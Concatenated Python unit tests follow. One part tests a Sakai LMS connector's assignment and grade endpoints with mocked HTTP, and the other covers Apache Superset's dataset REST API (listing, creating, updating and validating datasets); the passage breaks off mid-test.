'lms_user_id': fixtures.current_user_response['id'],
'email': fixtures.current_user_response['email'],
'first_name': fixtures.current_user_response['firstName'],
'last_name': fixtures.current_user_response['lastName'],
}
}
assert resp.json() == expected
assert resp.status_code == status.HTTP_200_OK
def test_get_assignment():
"""
Test getting an assignment.
Submit a quoted assignment id to the lms connector, and observe
that we call requests.get() using the unquoted version.
We mock the quoted version because requests.get() will automatically
quote the assignment id.
"""
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
# When the get request is made, the get itself will quote the
# assignment id.
mocked_resource_quoted = sakai.ASSIGNMENT_RESOURCE.format(
lms_course_id=mock_lms_course_id,
lms_assignment_id=mock_lms_assignment_id_quoted,
)
mocked_url_quoted = urljoin(mocked_lms_base_url, mocked_resource_quoted)
mocked_resource = sakai.ASSIGNMENT_RESOURCE.format(
lms_course_id=mock_lms_course_id,
lms_assignment_id=mock_lms_assignment_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
requests.get = spy_on(requests.get)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.get(
mocked_url_quoted,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_get_assignment_response,
)
resp = client.get(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
expected = {
'result': {
'title': fixtures.sakai_get_assignment_response['name'],
'max_grade':
fixtures.sakai_get_assignment_response['pointsPossible'],
}
}
assert resp.json() == expected
assert resp.status_code == status.HTTP_200_OK
# Check that we called get with the unquoted resource
actual_get_url = requests.get.mock.call_args_list[0][0][0]
assert actual_get_url == mocked_url
def test_post_grade():
"""
Test posting an assignment.
Via the URL submit a quoted assignment id, observe the unquoted
version in the body sent to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [{
'userId': '08f72871-4f03-4d76-8de6-eb35aba9f8f4',
'grade': '72'
}]}
expected_response_from_connector = {
"result": {
# In reality 'title' would be the 'lms_assigment_id' but given we
# are not testing a sakai sever they are not related as far
# as this unit test is concerned.
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
"grades": [
{
"lms_student_id": "08f72871-4f03-4d76-8de6-eb35aba9f8f4",
"grade": "72"
}
]
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource_quoted = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url_quoted = urljoin(mocked_lms_base_url, mocked_resource_quoted)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url_quoted,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_grade_response,
)
resp = client.post(
reverse(
'grades',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_grade_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_put_assignment():
"""
Test putting an assignment.
Via the URL submit a quoted assignment id, observe the unquoted
version in the body sent to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [],
}
expected_response_from_connector = {
"result": {
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_assignment_response,
)
resp = client.put(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_assignment_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_post_assignment():
"""
Test posting an assignment to Sakai.
We submit a quoted assignment id via the URL and check that the
unquoted version is in the body posted to the mock.
"""
mock_lms_assignment_id = 'mock lms assignment id'
mock_lms_assignment_id_quoted = quote(mock_lms_assignment_id)
assert '%20' in mock_lms_assignment_id_quoted
expected_post_to_sakai = {
'name': mock_lms_assignment_id,
'externalID': 'sssssssssssdddddd',
'pointsPossible': '100',
'scores': [],
}
expected_response_from_connector = {
"result": {
"title": "thinsusssslateONEMOREE",
"max_grade": 100,
}
}
mocked_lms_base_url = 'http://jjjjjjjj'
mock_lms_course_id = 'mock_lms_course_id'
mocked_resource = sakai.SCORES_RESOURCE.format(
lms_course_id=mock_lms_course_id,
)
mocked_url = urljoin(mocked_lms_base_url, mocked_resource)
with requests_mock.Mocker() as http_mock:
client = Client()
http_mock.post(
mocked_url,
status_code=status.HTTP_200_OK,
json=fixtures.sakai_post_assignment_response,
)
resp = client.post(
reverse(
'assignments',
kwargs={
'lms_course_id': mock_lms_course_id,
'lms_assignment_id': mock_lms_assignment_id_quoted,
},
),
content_type='application/json',
data=fixtures.sakai_post_assignment_data,
**fixtures.get_mocked_headers(mocked_lms_base_url)
)
assert http_mock.request_history[0].json() == expected_post_to_sakai
assert resp.json() == expected_response_from_connector
def test_required_get_auth_headers():
"""
Test error response from missing auth headers.
"""
mock_authorize_url = 'http://host/oauth-tool/authorize/'
data = {
'request_token_url': 'http://host/oauth-tool/request_tokén',
'authorize_url': mock_authorize_url,
'callback_url': "http://this.doesnt.ma/tter",
}
headers = {
header_key: header_val
for header_key, header_val,
in fixtures.get_mocked_headers('http://somebaseurl').items()
if header_key == 'HTTP_LMS_TYPE'
}
client = Client()
resp = client.get(
reverse('auth_url'),
content_type='application/json',
data=data,
**headers,
)
expected_errors = []
for required_header in sakai.AUTH_REQUIRED_HEADERS:
expected_errors.append(FormattedError(
source=helpers.HEADERS_PROCESSOR,
code=ErrorResponseCodes.missing_required_header,
detail=helpers.internal_header_to_external(required_header)
))
expected_error_response = ErrorLCResponse(
status_code=status.HTTP_400_BAD_REQUEST,
errors=expected_errors,
)
assert resp.data == expected_error_response.data
@pytest.mark.parametrize('http_method,endpoint,endpoint_kwargs', [
('get', 'courses', {}),
('post', 'assignments', {'lms_course_id': '-', 'lms_assignment_id': '-'}),
])
def test_required_headers_via_get(http_method, endpoint, endpoint_kwargs):
mocked_lms_base_url = 'http://jjjjjjjj'
headers = {
header_key: header_val
for header_key, header_val,
in fixtures.get_mocked_headers(mocked_lms_base_url).items()
if header_key == 'HTTP_LMS_TYPE'
}
client = Client()
resp = getattr(client, http_method)(
reverse(
endpoint,
kwargs=endpoint_kwargs,
),
content_type='application/json',
**headers,
)
expected_errors = []
for required_header in sakai.DEFAULT_REQUIRED_HEADERS:
expected_errors.append(FormattedError(
source=helpers.HEADERS_PROCESSOR,
code=ErrorResponseCodes.missing_required_header,
detail=helpers.internal_header_to_external(required_header)
))
expected_error_response = ErrorLCResponse(
status_code=status.HTTP_400_BAD_REQUEST,
errors=expected_errors,
)
assert resp.data == expected_error_response.data
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for Superset"""
import json
import unittest
from io import BytesIO
from typing import List, Optional
from unittest.mock import patch
from zipfile import is_zipfile, ZipFile
import prison
import pytest
import yaml
from sqlalchemy.sql import func
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.dao.exceptions import (
DAOCreateFailedError,
DAODeleteFailedError,
DAOUpdateFailedError,
)
from superset.extensions import db, security_manager
from superset.models.core import Database
from superset.utils.core import (
backend,
get_example_database,
get_example_default_schema,
get_main_database,
)
from superset.utils.dict_import_export import export_to_dict
from tests.integration_tests.base_tests import SupersetTestCase
from tests.integration_tests.conftest import CTAS_SCHEMA_NAME
from tests.integration_tests.fixtures.birth_names_dashboard import (
load_birth_names_dashboard_with_slices,
load_birth_names_data,
)
from tests.integration_tests.fixtures.energy_dashboard import (
load_energy_table_data,
load_energy_table_with_slice,
)
from tests.integration_tests.fixtures.importexport import (
database_config,
database_metadata_config,
dataset_config,
dataset_metadata_config,
dataset_ui_export,
)
class TestDatasetApi(SupersetTestCase):
fixture_tables_names = ("ab_permission", "ab_permission_view", "ab_view_menu")
fixture_virtual_table_names = ("sql_virtual_dataset_1", "sql_virtual_dataset_2")
@staticmethod
def insert_dataset(
table_name: str,
owners: List[int],
database: Database,
sql: Optional[str] = None,
schema: Optional[str] = None,
) -> SqlaTable:
obj_owners = list()
for owner in owners:
user = db.session.query(security_manager.user_model).get(owner)
obj_owners.append(user)
table = SqlaTable(
table_name=table_name,
schema=schema,
owners=obj_owners,
database=database,
sql=sql,
)
db.session.add(table)
db.session.commit()
table.fetch_metadata()
return table
def insert_default_dataset(self):
return self.insert_dataset(
"ab_permission", [self.get_user("admin").id], get_main_database()
)
def get_fixture_datasets(self) -> List[SqlaTable]:
return (
db.session.query(SqlaTable)
.filter(SqlaTable.table_name.in_(self.fixture_tables_names))
.all()
)
@pytest.fixture()
def create_virtual_datasets(self):
with self.create_app().app_context():
datasets = []
admin = self.get_user("admin")
main_db = get_main_database()
for table_name in self.fixture_virtual_table_names:
datasets.append(
self.insert_dataset(
table_name, [admin.id], main_db, "SELECT * from ab_view_menu;",
)
)
yield datasets
# rollback changes
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
@pytest.fixture()
def create_datasets(self):
with self.create_app().app_context():
datasets = []
admin = self.get_user("admin")
main_db = get_main_database()
for tables_name in self.fixture_tables_names:
datasets.append(self.insert_dataset(tables_name, [admin.id], main_db))
yield datasets
# rollback changes
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
@staticmethod
def get_energy_usage_dataset():
example_db = get_example_database()
return (
db.session.query(SqlaTable)
.filter_by(
database=example_db,
table_name="energy_usage",
schema=get_example_default_schema(),
)
.one()
)
def create_dataset_import(self) -> BytesIO:
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("dataset_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_metadata_config).encode())
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
return buf
def test_get_dataset_list(self):
"""
Dataset API: Test get dataset list
"""
example_db = get_example_database()
self.login(username="admin")
arguments = {
"filters": [
{"col": "database", "opr": "rel_o_m", "value": f"{example_db.id}"},
{"col": "table_name", "opr": "eq", "value": "birth_names"},
]
}
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 1
expected_columns = [
"changed_by",
"changed_by_name",
"changed_by_url",
"changed_on_delta_humanized",
"changed_on_utc",
"database",
"datasource_type",
"default_endpoint",
"description",
"explore_url",
"extra",
"id",
"kind",
"owners",
"schema",
"sql",
"table_name",
]
assert sorted(list(response["result"][0].keys())) == expected_columns
def test_get_dataset_list_gamma(self):
"""
Dataset API: Test get dataset list gamma
"""
self.login(username="gamma")
uri = "api/v1/dataset/"
rv = self.get_assert_metric(uri, "get_list")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["result"] == []
def test_get_dataset_related_database_gamma(self):
"""
Dataset API: Test get dataset related databases gamma
"""
self.login(username="gamma")
uri = "api/v1/dataset/related/database"
rv = self.client.get(uri)
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 0
assert response["result"] == []
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_get_dataset_item(self):
"""
Dataset API: Test get dataset item
"""
table = self.get_energy_usage_dataset()
main_db = get_main_database()
self.login(username="admin")
uri = f"api/v1/dataset/{table.id}"
rv = self.get_assert_metric(uri, "get")
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
expected_result = {
"cache_timeout": None,
"database": {
"backend": main_db.backend,
"database_name": "examples",
"id": 1,
},
"default_endpoint": None,
"description": "Energy consumption",
"extra": None,
"fetch_values_predicate": None,
"filter_select_enabled": False,
"is_sqllab_view": False,
"main_dttm_col": None,
"offset": 0,
"owners": [],
"schema": get_example_default_schema(),
"sql": None,
"table_name": "energy_usage",
"template_params": None,
}
if response["result"]["database"]["backend"] not in ("presto", "hive"):
assert {
k: v for k, v in response["result"].items() if k in expected_result
} == expected_result
assert len(response["result"]["columns"]) == 3
assert len(response["result"]["metrics"]) == 2
def test_get_dataset_distinct_schema(self):
"""
Dataset API: Test get dataset distinct schema
"""
def pg_test_query_parameter(query_parameter, expected_response):
uri = f"api/v1/dataset/distinct/schema?q={prison.dumps(query_parameter)}"
rv = self.client.get(uri)
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == expected_response
example_db = get_example_database()
datasets = []
if example_db.backend == "postgresql":
datasets.append(
self.insert_dataset(
"ab_permission", [], get_main_database(), schema="public"
)
)
datasets.append(
self.insert_dataset(
"columns", [], get_main_database(), schema="information_schema",
)
)
schema_values = [
"admin_database",
"information_schema",
"public",
]
expected_response = {
"count": 3,
"result": [{"text": val, "value": val} for val in schema_values],
}
self.login(username="admin")
uri = "api/v1/dataset/distinct/schema"
rv = self.client.get(uri)
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == expected_response
# Test filter
query_parameter = {"filter": "inf"}
pg_test_query_parameter(
query_parameter,
{
"count": 1,
"result": [
{"text": "information_schema", "value": "information_schema"}
],
},
)
query_parameter = {"page": 0, "page_size": 1}
pg_test_query_parameter(
query_parameter,
{
"count": 3,
"result": [{"text": "admin_database", "value": "admin_database"}],
},
)
for dataset in datasets:
db.session.delete(dataset)
db.session.commit()
def test_get_dataset_distinct_not_allowed(self):
"""
Dataset API: Test get dataset distinct not allowed
"""
self.login(username="admin")
uri = "api/v1/dataset/distinct/table_name"
rv = self.client.get(uri)
assert rv.status_code == 404
def test_get_dataset_distinct_gamma(self):
"""
Dataset API: Test get dataset distinct with gamma
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
uri = "api/v1/dataset/distinct/schema"
rv = self.client.get(uri)
assert rv.status_code == 200
response = json.loads(rv.data.decode("utf-8"))
assert response["count"] == 0
assert response["result"] == []
db.session.delete(dataset)
db.session.commit()
def test_get_dataset_info(self):
"""
Dataset API: Test get dataset info
"""
self.login(username="admin")
uri = "api/v1/dataset/_info"
rv = self.get_assert_metric(uri, "info")
assert rv.status_code == 200
def test_info_security_dataset(self):
"""
Dataset API: Test info security
"""
self.login(username="admin")
params = {"keys": ["permissions"]}
uri = f"api/v1/dataset/_info?q={prison.dumps(params)}"
rv = self.get_assert_metric(uri, "info")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert set(data["permissions"]) == {"can_read", "can_write", "can_export"}
def test_create_dataset_item(self):
"""
Dataset API: Test create dataset item
"""
main_db = get_main_database()
self.login(username="admin")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
data = json.loads(rv.data.decode("utf-8"))
table_id = data.get("id")
model = db.session.query(SqlaTable).get(table_id)
assert model.table_name == table_data["table_name"]
assert model.database_id == table_data["database"]
# Assert that columns were created
columns = (
db.session.query(TableColumn)
.filter_by(table_id=table_id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
# Assert that metrics were created
columns = (
db.session.query(SqlMetric)
.filter_by(table_id=table_id)
.order_by("metric_name")
.all()
)
assert columns[0].expression == "COUNT(*)"
db.session.delete(model)
db.session.commit()
def test_create_dataset_item_gamma(self):
"""
Dataset API: Test create dataset item gamma
"""
self.login(username="gamma")
main_db = get_main_database()
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.client.post(uri, json=table_data)
assert rv.status_code == 403
def test_create_dataset_item_owner(self):
"""
Dataset API: Test create item owner
"""
main_db = get_main_database()
self.login(username="alpha")
admin = self.get_user("admin")
alpha = self.get_user("alpha")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
"owners": [admin.id],
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(SqlaTable).get(data.get("id"))
assert admin in model.owners
assert alpha in model.owners
db.session.delete(model)
db.session.commit()
def test_create_dataset_item_owners_invalid(self):
"""
Dataset API: Test create dataset item owner invalid
"""
admin = self.get_user("admin")
main_db = get_main_database()
self.login(username="admin")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
"owners": [admin.id, 1000],
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {"message": {"owners": ["Owners are invalid"]}}
assert data == expected_result
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_create_dataset_validate_uniqueness(self):
"""
Dataset API: Test create dataset validate table uniqueness
"""
schema = get_example_default_schema()
energy_usage_ds = self.get_energy_usage_dataset()
self.login(username="admin")
table_data = {
"database": energy_usage_ds.database_id,
"table_name": energy_usage_ds.table_name,
}
if schema:
table_data["schema"] = schema
rv = self.post_assert_metric("/api/v1/dataset/", table_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
assert data == {
"message": {"table_name": ["Dataset energy_usage already exists"]}
}
def test_create_dataset_same_name_different_schema(self):
if backend() == "sqlite":
# sqlite doesn't support schemas
return
example_db = get_example_database()
example_db.get_sqla_engine().execute(
f"CREATE TABLE {CTAS_SCHEMA_NAME}.birth_names AS SELECT 2 as two"
)
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": CTAS_SCHEMA_NAME,
"table_name": "birth_names",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
# cleanup
data = json.loads(rv.data.decode("utf-8"))
uri = f'api/v1/dataset/{data.get('id')}'
rv = self.client.delete(uri)
assert rv.status_code == 200
example_db.get_sqla_engine().execute(
f"DROP TABLE {CTAS_SCHEMA_NAME}.birth_names"
)
def test_create_dataset_validate_database(self):
"""
Dataset API: Test create dataset validate database exists
"""
self.login(username="admin")
dataset_data = {"database": 1000, "schema": "", "table_name": "birth_names"}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, dataset_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
assert data == {"message": {"database": ["Database does not exist"]}}
def test_create_dataset_validate_tables_exists(self):
"""
Dataset API: Test create dataset validate table exists
"""
example_db = get_example_database()
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": "",
"table_name": "does_not_exist",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 422
@patch("superset.models.core.Database.get_columns")
@patch("superset.models.core.Database.has_table_by_name")
@patch("superset.models.core.Database.get_table")
def test_create_dataset_validate_view_exists(
self, mock_get_table, mock_has_table_by_name, mock_get_columns
):
"""
Dataset API: Test create dataset validate view exists
"""
mock_get_columns.return_value = [
{"name": "col", "type": "VARCHAR", "type_generic": None, "is_dttm": None,}
]
mock_has_table_by_name.return_value = False
mock_get_table.return_value = None
example_db = get_example_database()
engine = example_db.get_sqla_engine()
dialect = engine.dialect
with patch.object(
dialect, "get_view_names", wraps=dialect.get_view_names
) as patch_get_view_names:
patch_get_view_names.return_value = ["test_case_view"]
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": "",
"table_name": "test_case_view",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
# cleanup
data = json.loads(rv.data.decode("utf-8"))
uri = f'api/v1/dataset/{data.get('id')}'
rv = self.client.delete(uri)
assert rv.status_code == 200
@patch("superset.datasets.dao.DatasetDAO.create")
def test_create_dataset_sqlalchemy_error(self, mock_dao_create):
"""
Dataset API: Test create dataset sqlalchemy error
"""
mock_dao_create.side_effect = DAOCreateFailedError()
self.login(username="admin")
main_db = get_main_database()
dataset_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, dataset_data, "post")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be created."}
def test_update_dataset_item(self):
"""
Dataset API: Test update dataset item
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
dataset_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, dataset_data, "put")
assert rv.status_code == 200
model = db.session.query(SqlaTable).get(dataset.id)
assert model.description == dataset_data["description"]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_w_override_columns(self):
"""
Dataset API: Test update dataset with override columns
"""
# Add default dataset
dataset = self.insert_default_dataset()
self.login(username="admin")
new_col_dict = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"type": "INTEGER",
"verbose_name": "New Col",
}
dataset_data = {
"columns": [new_col_dict],
"description": "changed description",
}
uri = f"api/v1/dataset/{dataset.id}?override_columns=true"
rv = self.put_assert_metric(uri, dataset_data, "put")
assert rv.status_code == 200
columns = db.session.query(TableColumn).filter_by(table_id=dataset.id).all()
assert new_col_dict["column_name"] in [col.column_name for col in columns]
assert new_col_dict["description"] in [col.description for col in columns]
assert new_col_dict["expression"] in [col.expression for col in columns]
assert new_col_dict["type"] in [col.type for col in columns]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_create_column_and_metric(self):
"""
Dataset API: Test update dataset create column
"""
# create example dataset by Command
dataset = self.insert_default_dataset()
new_column_data = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"extra": '{"abc":123}',
"type": "INTEGER",
"verbose_name": "New Col",
"uuid": "c626b60a-3fb2-4e99-9f01-53aca0b17166",
}
new_metric_data = {
"d3format": None,
"description": None,
"expression": "COUNT(*)",
"extra": '{"abc":123}',
"metric_name": "my_count",
"metric_type": None,
"verbose_name": "My Count",
"warning_text": None,
"uuid": "051b5e72-4e6e-4860-b12b-4d530009dd2a",
}
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and metrics and append the new ones
self.login(username="admin")
rv = self.get_assert_metric(uri, "get")
data = json.loads(rv.data.decode("utf-8"))
for column in data["result"]["columns"]:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
data["result"]["columns"].append(new_column_data)
for metric in data["result"]["metrics"]:
metric.pop("changed_on", None)
metric.pop("created_on", None)
metric.pop("type_generic", None)
data["result"]["metrics"].append(new_metric_data)
rv = self.client.put(
uri,
json={
"columns": data["result"]["columns"],
"metrics": data["result"]["metrics"],
},
)
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
assert columns[2].column_name == new_column_data["column_name"]
assert columns[2].description == new_column_data["description"]
assert columns[2].expression == new_column_data["expression"]
assert columns[2].type == new_column_data["type"]
assert columns[2].extra == new_column_data["extra"]
assert columns[2].verbose_name == new_column_data["verbose_name"]
assert str(columns[2].uuid) == new_column_data["uuid"]
metrics = (
db.session.query(SqlMetric)
.filter_by(table_id=dataset.id)
.order_by("metric_name")
.all()
)
assert metrics[0].metric_name == "count"
assert metrics[1].metric_name == "my_count"
assert metrics[1].d3format == new_metric_data["d3format"]
assert metrics[1].description == new_metric_data["description"]
assert metrics[1].expression == new_metric_data["expression"]
assert metrics[1].extra == new_metric_data["extra"]
assert metrics[1].metric_type == new_metric_data["metric_type"]
assert metrics[1].verbose_name == new_metric_data["verbose_name"]
assert metrics[1].warning_text == new_metric_data["warning_text"]
assert str(metrics[1].uuid) == new_metric_data["uuid"]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_delete_column(self):
"""
Dataset API: Test update dataset delete column
"""
# create example dataset by Command
dataset = self.insert_default_dataset()
new_column_data = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"type": "INTEGER",
"verbose_name": "New Col",
}
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and append the new column
self.login(username="admin")
rv = self.get_assert_metric(uri, "get")
data = json.loads(rv.data.decode("utf-8"))
for column in data["result"]["columns"]:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
data["result"]["columns"].append(new_column_data)
rv = self.client.put(uri, json={"columns": data["result"]["columns"]})
assert rv.status_code == 200
# Remove this new column
data["result"]["columns"].remove(new_column_data)
rv = self.client.put(uri, json={"columns": data["result"]["columns"]})
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
assert len(columns) == 2
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column(self):
"""
Dataset API: Test update dataset columns
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and alter one
rv = self.get_assert_metric(uri, "get")
resp_columns = json.loads(rv.data.decode("utf-8"))["result"]["columns"]
for column in resp_columns:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
resp_columns[0]["groupby"] = False
resp_columns[0]["filterable"] = False
rv = self.client.put(uri, json={"columns": resp_columns})
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name, "name"
# TODO(bkyryliuk): find the reason why update is failing for the presto database
if get_example_database().backend != "presto":
assert columns[0].groupby is False
assert columns[0].filterable is False
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_delete_metric(self):
"""
Dataset API: Test update dataset delete metric
"""
dataset = self.insert_default_dataset()
metrics_query = (
db.session.query(SqlMetric)
.filter_by(table_id=dataset.id)
.order_by("metric_name")
)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
data = {
"metrics": [
{"metric_name": "metric1", "expression": "COUNT(*)"},
{"metric_name": "metric2", "expression": "DIFF_COUNT(*)"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 200
metrics = metrics_query.all()
assert len(metrics) == 2
data = {
"metrics": [
{
"id": metrics[0].id,
"metric_name": "metric1",
"expression": "COUNT(*)",
},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 200
metrics = metrics_query.all()
assert len(metrics) == 1
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column_uniqueness(self):
"""
Dataset API: Test update dataset columns uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {"columns": [{"column_name": "id", "type": "INTEGER"}]}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"columns": ["One or more columns already exist"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_metric_uniqueness(self):
"""
Dataset API: Test update dataset metric uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {"metrics": [{"metric_name": "count", "expression": "COUNT(*)"}]}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"metrics": ["One or more metrics already exist"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column_duplicate(self):
"""
Dataset API: Test update dataset columns duplicate
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {
"columns": [
{"column_name": "id", "type": "INTEGER"},
{"column_name": "id", "type": "VARCHAR"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"columns": ["One or more columns are duplicated"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_metric_duplicate(self):
"""
Dataset API: Test update dataset metric duplicate
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
